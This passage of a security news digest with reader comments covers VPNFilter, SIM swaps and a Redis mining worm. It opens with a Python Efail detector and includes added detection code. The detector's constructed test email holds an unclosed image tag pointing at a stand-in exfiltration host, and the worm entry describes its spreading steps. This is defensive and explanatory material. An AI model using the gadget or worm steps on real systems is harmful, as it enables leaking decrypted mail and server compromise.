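that ends inside an open tag (e.g. an unclosed <img src="...) and is immediately
followed by an encrypted unit (PGP/MIME container, S/MIME part, or inline PGP armor).
"""
import email
import re
from email import policy

# The HTML text's last '<' has no matching '>', i.e. the part ends inside a tag.
UNCLOSED_TAG = re.compile(r"<[^>]*\Z", re.DOTALL)
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"
ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime"}


def _units(part):
    """Yield (kind, text) in document order; kind is 'html', 'enc' or 'other'.

    A multipart/encrypted container is one 'enc' unit and its children are skipped,
    because the client treats the whole container as the ciphertext to decrypt.
    """
    ctype = part.get_content_type()
    if ctype in ENCRYPTED_TYPES:
        yield ("enc", "")
    elif part.is_multipart():
        for child in part.iter_parts():
            yield from _units(child)
    elif ctype == "text/html":
        yield ("html", part.get_content())
    elif ctype.startswith("text/") and PGP_ARMOR in part.get_content():
        yield ("enc", "")          # inline (non-MIME) PGP inside a text part
    else:
        yield ("other", "")


def find_exfil_gadgets(raw_message: bytes) -> list:
    """Return the unclosed tag fragments that directly precede an encrypted unit."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    units = list(_units(msg))
    findings = []
    for i, (kind, text) in enumerate(units):
        if kind != "html":
            continue
        match = UNCLOSED_TAG.search(text.rstrip())
        if match and i + 1 < len(units) and units[i + 1][0] == "enc":
            findings.append(match.group(0).strip())
    return findings


# Constructed sample in the Efail shape: open <img src=" ... encrypted part ... ">.
MALICIOUS = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: Fwd: report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="http://exfil.example.invalid/
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
cGxhY2Vob2xkZXIgLSBub3QgYSByZWFsIFBHUCBtZXNzYWdl
-----END PGP MESSAGE-----
--inner--
--outer
Content-Type: text/html

">
--outer--
"""

# Constructed benign sample: a well-formed HTML note followed by the same encrypted part.
BENIGN = MALICIOUS.replace(
    b'<img src="http://exfil.example.invalid/', b"<p>Encrypted report attached.</p>"
).replace(b'\n">\n--outer--', b"\n<p>Regards</p>\n--outer--")

if __name__ == "__main__":
    print("malicious:", find_exfil_gadgets(MALICIOUS))   # one unclosed <img src=...
    print("benign:", find_exfil_gadgets(BENIGN))         # []
```

A mail gateway or client plug-in can use this check to quarantine or flag such messages; disabling HTML rendering and remote-content loading, as the text recommends, closes the channel regardless.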
Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.
Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.
I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.
Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.
“If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers.”
Close to 12 million online users visited potentially dangerous websites during the first quarter of this year.
Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations
Here are two of the tips.
— Double check what you’re typing.
— Bookmark websites you visit often.
Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.
The ACLU of Northern California is shining more light on the tech this week.
“raises profound civil liberties and civil rights concerns.”
U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.
TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.
According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.
The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.
At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.
He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.
However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.
The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.
The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.
Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.
VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine.
FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.
The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.
A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.
According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.
Q: What devices are known to be affected by VPNFilter?
A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Q: How does VPNFilter infect affected devices?
A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.
My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check, whether your email has been leaked as a part of a data breach.
We talk about online security, including securing your accounts and using a password manager.
269 Comments
Tomi Engdahl says:
Adobe Reader zero-day discovered alongside Windows vulnerability
https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/
During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.
We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.
Tomi Engdahl says:
Some Firefox Screenshots End Up Publicly Accessible
https://www.securityweek.com/firefox-saves-screenshots-publicly-accessible-cloud-servers
Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.
Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.
Tomi Engdahl says:
U.S. Jury Convicts Operator of Counter AV Service Scan4You
https://www.securityweek.com/us-jury-convicts-operator-counter-av-service-scan4you
A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.
Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.
Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.
Tomi Engdahl says:
Critical Code Execution Flaws Patched in Advantech WebAccess
https://www.securityweek.com/critical-code-execution-flaws-patched-advantech-webaccess
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.
Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.
Tomi Engdahl says:
Auth0 Secures $55 Million in New Funding Round
https://www.securityweek.com/auth0-secures-55-million-new-funding-round
Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.
Tomi Engdahl says:
Critical Command Injection Flaw Patched in Red Hat Linux
https://www.securityweek.com/critical-command-injection-flaw-patched-red-hat-linux
A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.
Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.
The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.
The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.
“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.
https://access.redhat.com/security/cve/cve-2018-1111
Tomi Engdahl says:
NHS cyber-hero ‘discussed bank hack role’
http://www.bbc.com/news/technology-44139467
The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.
The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.
Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.
He has denied the charges.
The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the Wannacry ransomware attack
“So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.
Tomi Engdahl says:
Zack Whittaker / ZDNet:
A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent — The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time. — A company that collects the real …
Cell phone tracking firm exposed millions of Americans’ real-time locations
https://www.zdnet.com/article/cell-phone-tracking-firm-exposed-millions-of-americans-real-time-locations/
The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.
A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.
Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.
The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that lets you test the accuracy of its data. The page required explicit consent from the user before their location data can be used by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.
But that website had a bug that allowed anyone to track someone’s location silently without their permission.
Tomi Engdahl says:
US cell carriers are selling access to your real-time phone location data
https://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/
The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.
Tomi Engdahl says:
One in four APAC firms not sure if they suffered security breach
https://www.zdnet.com/article/one-in-four-apac-firms-not-sure-if-they-suffered-security-breach/
A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment, even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.
Tomi Engdahl says:
Mirai botnet adds three new attacks to target IoT devices
https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/
This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.
Tomi Engdahl says:
Lily Hay Newman / Wired:
Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — MOST ANTIVIRUS SCANNERS play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats.
https://www.wired.com/story/inside-scan4you-takedown
Tomi Engdahl says:
Music Business Worldwide:
After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach
TIDAL investigates ‘potential data breach’ following fake streams accusation
https://www.musicbusinessworldwide.com/tidal-investigates-potential-data-breach-following-accusations-of-fake-streams/
Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.
Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.
Tomi Engdahl says:
Cyrus Farivar / Ars Technica:
Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges
All of Mugshots.com’s alleged co-owners arrested on extortion charges
https://arstechnica.com/tech-policy/2018/05/all-of-mugshots-coms-alleged-co-owners-arrested-on-extortion-charges/
Mugshots.com is a “business permeated with fraud,” California AG says.
Tomi Engdahl says:
Dan Goodin / Ars Technica:
McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook
North Korea-tied hackers used Google Play and Facebook to infect defectors
Apps hosted in Google market for two months were spread over Facebook.
https://arstechnica.com/information-technology/2018/05/north-korea-tied-hackers-use-google-play-and-facebook-to-infect-defectors/
Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.
The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.
The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.
https://securingtomorrow.mcafee.com/mcafee-labs/malware-on-google-play-targets-north-korean-defectors/
Tomi Engdahl says:
Patrick Winn / GlobalPost Investigations:
Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+ — The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews.
How North Korean hackers became the world’s greatest bank robbers
https://gpinvestigations.pri.org/how-north-korean-hackers-became-the-worlds-greatest-bank-robbers-492a323732a6
The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.
Tomi Engdahl says:
Chance Miller / 9to5Mac:
Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities — Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps …
Apple cracking down on CallKit apps in China App Store due to government regulation
https://9to5mac.com/2018/05/19/apple-cracking-down-on-callkit-apps-in-china-app-store-due-to-government-regulation/
Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…
Tomi Engdahl says:
UK to introduce internet safety laws within ‘next couple of years’
Social networks may be on the hook for exposing kids to online bullying.
https://www.engadget.com/2018/05/20/uk-plans-internet-safety-laws/
Tomi Engdahl says:
T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account
https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/
T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.
Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.
So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or an automated call that reads the one-time code aloud.
A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.
However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.
Tomi Engdahl says:
Malicious Powershell Targeting UK Bank Customers
https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/
Tomi Engdahl says:
Chrome to Issue Red “Not Secure” Warning for HTTP
https://www.securityweek.com/chrome-issue-red-not-secure-warning-http
Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.
The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.
Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.
Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.
At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.
Tomi Engdahl says:
Hacked Drupal Sites Deliver Miners, RATs, Scams
https://www.securityweek.com/hacked-drupal-sites-deliver-miners-rats-scams
The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.
Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.
CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.
Tomi Engdahl says:
Two Vulnerabilities Patched in BIND DNS Software
https://www.securityweek.com/two-vulnerabilities-patched-bind-dns-software
Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.
While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.
One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.
The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.
Tomi Engdahl says:
Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
https://www.securityweek.com/man-sentenced-15-years-prison-ddos-attacks-firearm-charges
A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.
John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.
Tomi Engdahl says:
More Charges Against ‘Syrian Electronic Army’ Hackers
https://www.securityweek.com/more-charges-against-syrian-electronic-army-hackers
The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.
Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.
Tomi Engdahl says:
“Wicked” Variant of Mirai Botnet Emerges
https://www.securityweek.com/wicked-variant-mirai-botnet-emerges
A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributes a new bot, Fortinet researchers warn.
Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.
The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.
Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.
Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.
A Wicked Family of Bots
https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html
Tomi Engdahl says:
Phishing Roundup: Caracal, Stealth Mango, Tangelo, Apple, DHL, eFax & More
https://www.bleepingcomputer.com/news/security/phishing-roundup-caracal-stealth-mango-tangelo-apple-dhl-efax-and-more/
Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.
Tomi Engdahl says:
Business Email Compromise incidents
https://isc.sans.edu/forums/diary/Business+Email+Compromise+incidents/23669/
Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access.
The objective is simple: use the system to convince the organisation, or a customer of the organisation, to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.
Whilst similar to whaling emails the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:
Compromise victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
Compromise victim company, identify customer invoices to be paid to the victim, spoof the victim and convince customers to pay invoices into an incorrect account.
There are a few opportunities to detect or prevent these kinds of attacks:
Prevent
Have a robust payment changing process – validate using details you have in your database and call them regardless of whether someone called you
Don’t pay to overseas accounts – especially when previous invoices were paid within the country.
Check previous payments – Where did they go, is this different, if so halt the payment.
Disallow forwarding rules to external addresses – This won’t stop it, but does make it more difficult
Multi Factor Authentication (MFA) on mail
Detect
Logins from locations other than your office
Logins where the IP address changes – we see many use open proxies when logging into a victim account. In logs that looks like the person travels rapidly across the globe.
Regularly interrogate rules created in the email product – this is often how we find the other compromised accounts.
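As an added example (not part of the ISC diary or this comment), the three detection ideas above, logins from outside the office, a user whose IP address hops across the globe within minutes, and inbox rules that forward mail externally, run as Python over a few constructed log lines. The log format, the office egress addresses, the country per IP and the rule export layout are all assumptions; a real deployment would resolve countries with a GeoIP database and pull rules from the mail platform's admin API.

```python
"""Added example: flag the BEC indicators the diary lists on constructed mail-login logs.

Assumptions (not from the diary): log lines are 'timestamp,user,ip,country' CSV,
the office egress addresses are known, and the country for each IP is already
resolved. All sample data below is constructed."""
from datetime import datetime

# Constructed sample: one user logging in from the office, one whose session
# hops between three countries in eight minutes (typical of open-proxy use).
LOGIN_LOG = """\
2018-05-17T08:02:11,alice@example.test,203.0.113.10,AU
2018-05-17T08:40:53,alice@example.test,203.0.113.10,AU
2018-05-17T09:01:22,bob@example.test,198.51.100.7,AU
2018-05-17T09:04:05,bob@example.test,192.0.2.44,US
2018-05-17T09:09:48,bob@example.test,192.0.2.200,NL
"""

OFFICE_EGRESS = {"203.0.113.10", "203.0.113.11"}   # constructed office IPs
INTERNAL_DOMAIN = "example.test"                    # constructed mail domain
MAX_COUNTRIES_PER_WINDOW = 2   # more distinct countries than this in one window = alert

# Constructed inbox-rule export as a mail admin might pull it.
INBOX_RULES = [
    {"user": "alice@example.test", "name": "Receipts",
     "forward_to": None, "delete": False},
    {"user": "bob@example.test", "name": ".",
     "forward_to": "finance.bob@webmail.example.net", "delete": True},
]


def parse_log(text):
    """Parse the constructed CSV log into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, user, ip, country = line.split(",")
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "ip": ip, "country": country})
    return events


def logins_outside_office(events):
    """Detect: logins from locations other than your office."""
    return [(e["user"], e["ip"]) for e in events if e["ip"] not in OFFICE_EGRESS]


def impossible_travel(events, window_hours=1):
    """Detect: per user, how many distinct countries appear inside a sliding
    window. Open proxies make one 'person' appear to jump continents in minutes."""
    by_user = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_user.setdefault(e["user"], []).append(e)
    alerts = []
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            window = [x for x in evs[i:]
                      if (x["ts"] - first["ts"]).total_seconds() <= window_hours * 3600]
            countries = {x["country"] for x in window}
            if len(countries) > MAX_COUNTRIES_PER_WINDOW:
                alerts.append((user, tuple(sorted(countries))))
                break   # one alert per user is enough to trigger a review
    return alerts


def suspicious_rules(rules):
    """Detect: rules that forward mail to an external domain, or hide replies by
    deleting them. Both are common traces of a compromised mailbox."""
    found = []
    for r in rules:
        fwd = r["forward_to"]
        external = fwd is not None and not fwd.lower().endswith("@" + INTERNAL_DOMAIN)
        if external or r["delete"]:
            found.append((r["user"], r["name"]))
    return found


if __name__ == "__main__":
    evs = parse_log(LOGIN_LOG)
    print("outside office:", logins_outside_office(evs))
    print("impossible travel:", impossible_travel(evs))
    print("suspicious rules:", suspicious_rules(INBOX_RULES))
```

The forwarding check deliberately also flags delete-on-arrival rules with odd names (a single "." is a constructed stand-in for the near-invisible names attackers pick), since the diary notes that rule review is how the other compromised accounts are usually found.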
Tomi Engdahl says:
Anatomy of a Redis mining worm
https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/
Publicly accessible Redis servers have been exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% in Hong Kong.
The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.
When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case, transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, that’s assumed to be the reason that a copy will be made on each replication.
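The probe quoted above, "*1\r\n$4\r\nINFO\r\n", is a RESP (Redis serialization protocol) array holding a single bulk string. As an added example (not the diary's code), the Python below decodes captured client-to-server Redis frames and flags a session that sends INFO without any prior AUTH, which is what an unauthenticated scanner looks like to a honeypot or IDS. The captured sessions are constructed; only the INFO payload itself comes from the diary.

```python
"""Added example (not from the ISC diary): decode RESP command frames from captured
Redis traffic and flag unauthenticated INFO probes like the one the worm sends."""


def encode_command(*args):
    """Encode a Redis command as a RESP array of bulk strings (client -> server)."""
    out = f"*{len(args)}\r\n"
    for a in args:
        out += f"${len(a)}\r\n{a}\r\n"
    return out.encode()


def decode_resp_array(data):
    """Decode one RESP array of bulk strings; return (args, remaining_bytes).
    Raises ValueError on anything that is not a well-formed command array."""
    if not data.startswith(b"*"):
        raise ValueError("not a RESP array")
    end = data.index(b"\r\n")
    count = int(data[1:end])
    pos = end + 2
    args = []
    for _ in range(count):
        if data[pos:pos + 1] != b"$":
            raise ValueError("expected bulk string")
        end = data.index(b"\r\n", pos)
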